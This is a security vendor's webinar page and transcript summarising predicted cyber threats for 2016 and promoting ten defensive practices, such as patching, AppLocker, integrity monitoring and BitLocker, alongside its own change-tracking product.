Top Cyber Threats Expected in 2016!
What Can You Expect & What Can You do to Protect Yourself?
It should come as no surprise that cyber threats are continuing to evolve both in sophistication and the level of threat they represent. Despite these continued threats, there’s an equally improving maturity within the cyber security community & growing evidence that a simple, pragmatic and best practice approach to security is more than capable of fending off the threat.
Watch our first webinar of 2016- NNT’s 2016 Threat Predictions Webinar. Hear from NNT CTO- Mark Kedgley and US Country Manager Mark Kerrison as they summarize some of the expected changes in the threat landscape and some smart automated monitoring tactics that you can deploy to improve security while still allowing you the time to focus on your day job.
You’ll learn:
- Summary Of The Top Predicted Threats For 2016
- The Typical Mistakes Made By Most IT Teams
- The Use Of Automated ‘Threat Intelligence & Change Detection’ To Weed Out Malicious Activity
- 10 Tips For An Improved IT Estate
Video Transcript
Agenda
- Summary Of The Top Predicted Threats For 2016
- Mark Teicher HP
- The Typical Mistakes Made By Most IT Teams
- 10 Tips For An Improved IT Estate
- The Use Of Automated ‘Threat Intelligence & Change Detection’
- Q & A
What Do Experian Think?
What Do Experian Think?
Interestingly the considered outlook for credit card theft remains gloomy, 47% predicting no decrease at all – never mind any improvement
Healthcare records worth 10 times credit card. Healthcare providers have notoriously poor defenses – FBI warnings following a bout of breaches including one leading provider who had 4.5 million records compromised
Cyber war between Enemy Nations may include public facilities such as Airport, Hospitals and Government Facilities
Hacktivism both corporate shaming and ‘cause based’ will increase – considered the ultimate leveler
What Do Trend Think?
What Do Trend Think?
2016 will see an increase in online extortion – already seen examples such as the LA Presbyterian Med Center
At least one consumer grade smart device will cause fatalities – Drones and Medical Smart Devices are considered risky
China will drive mobile malware growth to 20M by the end of 2016 (3 out of 4 apps are Malware?)
Hacktivism will increase as a result of proven corporate naming and shaming as well as geopolitical targets
Despite all if this, less than 50% of organizations will have dedicated IT protection specialists
Cybercrime legislation will become a Global Movement
What Do Gartner Think?
What Do Gartner Think?
Gartner take a somewhat different approach – in that they are sponsoring recommendations rather than predictions
- The attack surface is changing all the time – new targets as well as Bimodal and Shadow IT are driving the shift
- Focus on Configuration Hardening – Don’t over focus on Zero Day APT’s. Nod towards pragmatism perhaps?
- Balance focus between perimeter and core
- Mapping visibility. The better you understand what you have the better able to protect and monitor it you will be
- Emphasize prevention rather than detection & focus on the fundamentals of cyber protection rather than the latest thing!
The key point here is that most attacks have been and remain avoidable based on past experience
- Gartner report that 99.99% of exploits are based on vulnerabilities known for at least a year
- This will continue through 2020! “Don’t focus too much on Zero Day Threats!
- Last year’s most prevalent malware ‘conficker’ based on a 7 year old vulnerability within windows – Disable ‘autorun’, ‘runonce’ etc
- Known vulnerabilities will be sold on the black market more
What Do NNT Think?
What Do NNT Think?
- The field of attack is ever broadening as new lucrative and or disruptive targets are identified & those with a cause however justifiable seek to enter the arena
- Regular crooks and Teamsters will join the cybercrime movement. No longer the domain of the specialist hackers
- We think that every single person attending this webinar will in some way fall victim to cybercrime in 2016 – however lightly. Could just be unwanted spam but could equally be stolen Social Security – Credit Card or other personal data
- Apathy (it won’t happen to us) and Cost remain the two major blocks to Corporate & Government Cyber Security
- The litigators are circling!
Mark Teicher, HP Enterprise – From My Experience?
Mark Teicher, HP Enterprise – From My Experience?
- Understand what you have – estate Visibility is crucial
- Document?
- Train?
- Motivate the people around you into action
The Typical Mistakes Made by Most IT Teams - You get told you need security products
So we all get sold on the need for Cyber Security defense measures and there is plenty of FUD used to amplify the urgency and acuteness of the need. But the problem is often the same as personal health cures – there are always vendors in the market trying to say that they can cure all known threats when actually, just like personal health, it just isn’t as simple as that. Cyber Security takes many forms and the range and nature of threat is so varied that there just isn’t any getting away from the fact that it will require a multi-faceted solution.
The Typical Mistakes Made by Most IT Teams - How Security Products are sold
But – it’s easy to be tempted by the pitch! A sexy looking security appliance that looks better than your stereo (or whatever it is that you play music on these days) is tempting. And if it really can capture and defeat APTs, Phishing attacks, malware, insider threats, hacktivism, rogue employees, ransomware and government-sponsored/ blue chip espionage, then all our problems are solved? Analysts play a part in this too – they love a new concept, a new company and a new idea and their lifeblood is the new.
Most recent examples include the ‘new generation’ sandbox-technology appliances. They do a great job of identifying and isolating malware and especially the APT-style malware that actively downloads additional components once in place then exfiltrates data form the network. But not all APT malware – highly obfuscated code coupled with delayed action APT operation can circumvent the sandbox detection capabilities. And any malware that is introduced from employees, either intentionally or unintentionally won’t be scrutinized by the appliance. So even a great piece of technology is also invariably limited, and the same is true of all the SIEM systems, IPS, AV, and even the FIM systems out there. Apart from ours of course J
One day, when they close all the gyms, pharmacies and hospitals and replace them with juice bars we may also be able to forget about cyber security due to some kind of all-seeing super-intelligent appliance that controls everyone and everything, but until then, we all know it is going to be a case of doing a wide range of things well.
The Typical Mistakes Made by Most IT Teams - Why Corporate Cyber Security fails
The Typical Mistakes Made by Most IT Teams - Why Corporate Cyber Security fails
So if you really could lose weight, build a six pack and get marathon-beating stamina from drinking a kale and Persian cucumber milkshake – would you do it?
Maybe, but not everyone would succeed – in fact most would give it up and go back to bad habits. And cyber security can be similar – it’s a 24/7 discipline and requires a combination of technology measures, procedures and working practices to maintain solid defenses. And this is why organizations get breached and will continue to get breached unless Cyber Security mind-set becomes second nature for all employees.
But in the meantime….
Top Ten Cyber Security Tips
Top Ten Cyber Security Tips
- Mitigate Vulnerabilities
- Firewall or better, IPS
- AV
- EMET
- AppLocker
- System Integrity Monitoring
- Change Control – augmented with Threat Intelligence
- Promote and enforce an IT Security Policy
- BitLocker
- Finally - Don’t be too thrown off course by the latest ‘must-haves’
….in the meantime, what should you be focusing on?
Here’s a quick summary – there are more comprehensive security policies, standards and guidelines out there – see the PCI DSS (Version 3.2 is almost here) or any of the other standards I showed earlier like NERC CIP, NIST 800-53 etc. There are also generic policies, like the SANS Top 20 or the CIS Security Policy that are freely available.
Top Ten Cyber Security Tips: 1
Top Ten Cyber Security Tips:
1.Mitigate Vulnerabilities
- Hugely effective in protecting IT Assets
- Mandatory for all Compliance and Security Policies
- NIST 800-53, PCI DSS, HIPAA, STIG, NERC CIP, SOX
- Effectively Free of Charge
Easier said than done and most security policies duck out of providing specific prescriptive guidance, partly because this is a fluid area and the latest intelligence is always needed, but also because vulnerabilities need to be balanced against risk and operational requirements
In other words, most security professionals will tell you to minimize open ports and remove any unnecessary services, in particular FTP and Web Servers, so a typical hardening exercise involves removing these. But if you actually need these for your application then you will need to provide security via other means.
The latest Microsoft Security Policy covers literally thousands of settings that control functional operation and in turn security of a host, so deriving the best balanced build standard can be a painstaking task. Fortunately automated auditing using file integrity monitoring or vulnerability scanning tools is available, not least in Change Tracker Gen 7, which uses THE best guidance available – the Center for Internet Security Benchmarks. CIS Benchmarks are free to download in their text form and they provide a description of each vulnerability, how to audit for its presence and how to remediate if required.
Top Ten Cyber Security Tips: 2,3,4 & 5
Top Ten Cyber Security Tips:
2. Firewall or better, IPS
3. AV
4. EMET
5. AppLocker
- Tip: See https://www.nntws.com/ransomware-phishing-defenses.html
- Tip: UAC should be your starting point in locking down systems (Windows) or Least Privilege (*Nix)
- Tip: Windows Defender, EMET and AppLocker are all free add-ons
The best understood elements of any cyber security kitbag are the firewall and AV. They are fallible as we all know – zero day threats easily evade AV even while the AV is gobbling up system resources and more often than not, getting in the way.
Likewise for the firewall or IPS - there are numerous ways to leapfrog the Firewall using phishing attacks, APT technology or just plain old Inside Help. However, as we said earlier, there isn’t going to be a quick fix, single course of action of technology that will keep us secure, and these legacy security components still play an essential role.
Less well understood are some of the complementary technologies available that can be used to plug further weak spots. The market is awash with good ideas and sexy sounding technology – ‘enterprise auto immunization based on Bayesian probability analytics’ is the latest slick sales pitch doing the rounds and while very attention grabbing, I would say to look at what is available to you right now, but is probably not being used.
Namely EMET and AppLocker – both are Microsoft offerings, free to use, but requiring a little bit of knowhow and experimentation to implement.
EMET works to head off a number of malware techniques, especially ‘file-less’ malware that tries to use process hijacking, memory exploits, browser vulnerabilities and man in the middle attacks.
AppLocker provides the means to whitelist/blacklist program and dll operation to really lockdown PC and Server operation.
There are many commercial offerings covering similar areas of course but neither of these, nor Windows Defender, should be overlooked.
Top Ten Cyber Security Tips: 6 & 7
Top Ten Cyber Security Tips:
6. System Integrity Monitoring
7. Change Control – augmented with Threat Intelligence
Three main reasons why change control and system integrity monitoring are vital to maintaining cyber security.
Firstly, now that we have implemented all our Vulnerability Mitigation and secure config work, we would now like that to remain in effect for ever more. So we need a means of assessing when changes are made to systems, and to understand what they are and if they weaken security. This is still best handled using file integrity monitoring technology.
Second – any change or update could impact functional operation, so it is vital we have visibility of any changes made.
Finally, if we can get visibility of changes as they happen – and especially if we have a means of reconciling these with details of known expected planned changes, then we have a highly sensitive breach detection mechanism to spot suspicious action when it happens.
All leading cyber security policies/standards call for change control and system integrity monitoring for all these reasons – it is key.
Top Ten Cyber Security Tips: 8 & 9
Top Ten Cyber Security Tips:
8. Promote and enforce an IT Security Policy
9. Encryption (BitLocker)
- The biggest security weakness is the one using the keyboard
- Data Encryption is a blunt instrument, but could save your neck!
- Tip: MS BitLocker is included with Windows
Mark Teicher highlighted this earlier, that Cyber Security isn’t just the responsibility of the IT team and their security kit, but must be an organization-wide competence.
Children grow-up being taught about food hygiene - it isn’t just the remit for professional chefs – but until Cyber Security hygiene becomes a basic life skill it will be down to the workplace to educate.
Just in case you don’t already have flyers/posters for Cyber Security education there are plenty of resources available, again the SANS Institute provide a bunch of these that are free to use and very good.
The other area I wanted to highlight here is data encryption – it slows everything down and gets in the way on a daily basis BUT it can prove a lifesaver if there is a breach that results in data theft. Loss of a company laptop is a pain but the loss of confidential data could result in anything from acute embarrassment to fines and lawsuits. Again plenty of commercial options exists and there is also a free of charge MS option or this too in BitLocker. You can use it to encrypt all drives or just data on local and removable drives.
In an enterprise environment this is controlled via Group Policy and as such, can also be audited using Change Tracker. The cool thing is that this audit report not only provides the recommended settings to use to help when first implementing BitLocker, but it will also highlight any drift from your preferred corporate build standard, along with all the other security settings needed to protect systems.
Top Ten Cyber Security Tip: 10
Top Ten Cyber Security Tips:
10. Finally - Don’t be too thrown off course by the latest ‘must-haves’
- No such thing as 100% security
- No Magic Bullet (for cyber security or personal health J)
- Cyber Security still requires a layered approach, and is still hard work MAY require some work
- BUT it can be automated and made easier by good technology
And Finally
And the final piece of advice really is to focus on getting the fundamentals right and not chase the niche point products.
If the ‘no such thing as 100%’ security is accepted then how are you going to achieve cyber security?
The only answer is that it will need to be managed as a layered and 360 degree discipline, comprising technology and processes to first instigate and then maintain security.
Get your technology right for the general, everyday security before investing too much time and money into the latest hot product. Vulnerability Management, System Hardening, File Integrity Monitoring, Change Control and Breach Detection are some of the absolutely essential components needed – the good news is we can help automate and simplify all of this in one unified solution.
- Read the article 2016 Cyber Security Threat Predictions and Why Nutrient-Extracting Blenders Still aren’t the Answer
- Download the white paper 2016 Threat Predictions and Top Ten Cyber Security Tips To Keep You Safe